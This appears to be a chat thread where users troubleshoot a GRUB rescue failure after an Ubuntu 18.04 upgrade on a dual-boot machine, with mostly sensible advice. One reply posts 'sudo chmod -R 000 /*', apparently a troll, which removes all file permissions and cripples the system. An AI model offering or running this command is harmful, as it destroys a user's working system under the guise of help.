So i did dual boot everything and it worked perfectly till i had to update Ubuntu and it asked about the grub and if i wanted to update that and by instinct i said sure! but it fucked up alot of stuff and i had to reinstall windows again... so do i not update Grub? My linux install was for a previous Ubuntu version 16.04.4 LTS and i updated it after 4 days to 18.04 LTS... and thats when it asked about the grub update... what do i do to not have this happen again?

That's really unclear, what exactly did it ask you and what exactly happened after you said yes?

sorry about being unclear...

So it asked do i want to keep grub how it is... customize grub.... 2 options that i dont remember that was related to customizing/moving files around.... and one just said update grub to newest version at the bottom

i updated it... it worked fine till it restarted and then it booted into grub rescue and then it said no partition found i couldnt boot into linux or windows (no i didnt shut it down mid update or anything i waited till it asked if i wanted to restart and i clicked yes)

It's possible that for some reason the update deleted grub's configuration file - in that case, it should be enough to manually generate a configuration after the update:

grub-mkconfig -o /boot/grub/grub.cfg

if windows doesn't show up in grub after this, you can try installing os prober and try again.

Either way, there shouldn't be any big issues if you don't update grub; if this is just your home pc and you aren't too concerned with people having physical access to your machine, you can just ignore it.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

Oh dude you could just have used a rescue CD instead of reinstalling windows...

Anyway it is strange, are you sure you don't used some strange grub configurator?

Anyway there are plenty of grub rescue disks, just Google then
